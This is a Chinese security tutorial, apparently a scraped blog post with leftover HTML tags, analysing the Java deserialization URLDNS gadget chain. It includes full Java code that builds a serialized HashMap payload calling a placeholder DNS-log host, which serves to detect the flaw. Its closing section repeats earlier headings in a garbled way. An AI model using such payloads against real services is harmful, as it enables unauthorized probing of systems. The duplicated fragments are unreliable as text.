Java反序列化漏洞利用：URLDNS链分析<\/h1>

一、漏洞原理概述<\/h2>
URLDNS链是Java反序列化漏洞中一个经典的利用链，它利用了Java原生类`URL<\/code>和HashMap<\/code>的特性来实现DNS查询，常用于验证反序列化漏洞的存在。<\/p>`

关键点：<\/h3>

URL<\/code>类实现了Serializable<\/code>接口，可以被序列化<\/li>
URL<\/code>类重写了hashCode()<\/code>方法<\/li>
当URL<\/code>对象作为HashMap<\/code>的key时，会触发hashCode()<\/code>计算<\/li>
URL.hashCode()<\/code>内部会解析URL的主机名，导致DNS查询<\/li>
<\/ol>
二、核心类分析<\/h2>
1. URL类<\/h3>
public<\/span> final<\/span> class<\/span> URL<\/span> implements<\/span> java.<\/span>io<\/span>.<\/span>Serializable<\/span> {<\/span>
<\/span><\/span>    private<\/span> int<\/span> hashCode =<\/span> -<\/span>1<\/span>;<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    public<\/span> synchronized<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>hashCode !=<\/span> -<\/span>1<\/span>)<\/span>
<\/span><\/span>            return<\/span> hashCode;<\/span>
<\/span><\/span>        hashCode =<\/span> handler.<\/span>hashCode<\/span>(<\/span>this<\/span>);<\/span>
<\/span><\/span>        return<\/span> hashCode;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键特性：<\/p>

实现了Serializable<\/code>接口<\/li>
使用hashCode<\/code>字段缓存哈希值（初始为-1）<\/li>
当hashCode == -1<\/code>时，会调用handler.hashCode(this)<\/code>进行实际计算<\/li>
<\/ul>
2. HashMap类<\/h3>
当对象放入HashMap时：<\/p>

会调用对象的hashCode()<\/code>方法计算哈希值<\/li>
如果哈希冲突，还会调用equals()<\/code>方法<\/li>
<\/ol>
三、漏洞利用过程<\/h2>
基本利用流程<\/h3>

创建HashMap对象<\/li>
将URL对象作为key放入HashMap<\/li>
序列化HashMap<\/li>
反序列化HashMap时触发DNS查询<\/li>
<\/ol>
问题发现<\/h3>
直接实现时发现：<\/p>

序列化时就会触发DNS查询（非预期）<\/li>
反序列化时不会触发DNS查询（因为hashCode已被缓存）<\/li>
<\/ul>
原因：<\/p>

序列化时hashCode()<\/code>计算后，值被缓存（不再为-1）<\/li>
反序列化后直接返回缓存值，不再调用handler.hashCode(this)<\/code><\/li>
<\/ul>
解决方案<\/h3>
使用反射机制控制hashCode<\/code>值：<\/p>

创建URL对象后，立即将其hashCode<\/code>设为1（防止序列化时触发DNS）<\/li>
将URL放入HashMap<\/li>
再将hashCode<\/code>设为-1（确保反序列化时触发DNS）<\/li>
序列化HashMap<\/li>
<\/ol>
四、完整利用代码<\/h2>
import<\/span> java.io.FileOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.net.URL;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> URLDNSExploit<\/span> {<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"payload.ser"<\/span>));<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        HashMap<<\/span>URL,<\/span> Integer><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/yourdnslog.example.com"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 使用反射修改URL对象的hashCode值
<\/span><\/span><\/span><\/span>        Class<?><\/span> urlClass =<\/span> url.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Field hashCodeField =<\/span> urlClass.<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span>
<\/span><\/span>        hashCodeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 1. 先设为非-1值，防止put时触发DNS
<\/span><\/span><\/span><\/span>        hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 将URL放入HashMap
<\/span><\/span><\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>url,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 将hashCode改回-1，确保反序列化时触发DNS
<\/span><\/span><\/span><\/span>        hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 序列化HashMap
<\/span><\/span><\/span><\/span>        serialize(<\/span>hashMap);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>五、技术细节分析<\/h2>
为什么HashMap会触发URL的hashCode？<\/h3>
当对象作为HashMap的key时：<\/p>

HashMap需要计算key的哈希值来确定存储位置<\/li>
计算过程调用key对象的hashCode()<\/code>方法<\/li>
对于URL对象，当hashCode == -1<\/code>时会触发DNS解析<\/li>
<\/ol>
反射的作用<\/h3>

绕过URL类的封装，直接修改私有字段hashCode<\/code><\/li>
控制DNS触发时机：

序列化前防止触发（设为1）<\/li>
反序列化时确保触发（设为-1）<\/li>
<\/ul>
<\/li>
<\/ol>
六、防御措施<\/h2>

避免反序列化不可信数据<\/li>
使用白名单机制限制可反序列化的类<\/li>
使用安全框架如SerialKiller、Hessian等<\/li>
升级JDK版本，某些版本有修复措施<\/li>
<\/ol>
七、实际应用场景<\/h2>

漏洞验证：快速验证反序列化漏洞是否存在<\/li>
无回显漏洞探测：通过DNS查询确认漏洞<\/li>
内网探测：结合DNSLog平台探测内网服务<\/li>
<\/ol>
八、注意事项<\/h2>

该链仅能触发DNS查询，无法执行代码<\/li>
需要出网环境（能够进行DNS解析）<\/li>
适用于大多数JDK版本，兼容性好<\/li>
生成的payload不依赖第三方库，纯Java原生类实现<\/li>
<\/ol>
九、扩展思考<\/h2>

如何将该技术与其他反序列化链结合？<\/li>
在不出网环境下如何利用反序列化漏洞？<\/li>
如何检测和防御此类攻击？<\/li>
<\/ol>

Java反序列化漏洞利用：URLDNS链分析<\/h1>

一、漏洞原理概述<\/h2> URLDNS链是Java反序列化漏洞中一个经典的利用链，它利用了Java原生类URL<\/code>和HashMap<\/code>的特性来实现DNS查询，常用于验证反序列化漏洞的存在。<\/p>

二、核心类分析<\/h2>

三、漏洞利用过程<\/h2>

五、技术细节分析<\/h2>

九、扩展思考<\/h2> 如何将该技术与其他反序列化链结合？<\/li> 在不出网环境下如何利用反序列化漏洞？<\/li> 如何检测和防御此类攻击？<\/li> <\/ol>

一、漏洞原理概述<\/h2>
URLDNS链是Java反序列化漏洞中一个经典的利用链，它利用了Java原生类`URL<\/code>和HashMap<\/code>的特性来实现DNS查询，常用于验证反序列化漏洞的存在。<\/p>`

九、扩展思考<\/h2>

如何将该技术与其他反序列化链结合？<\/li>
在不出网环境下如何利用反序列化漏洞？<\/li>
如何检测和防御此类攻击？<\/li> <\/ol>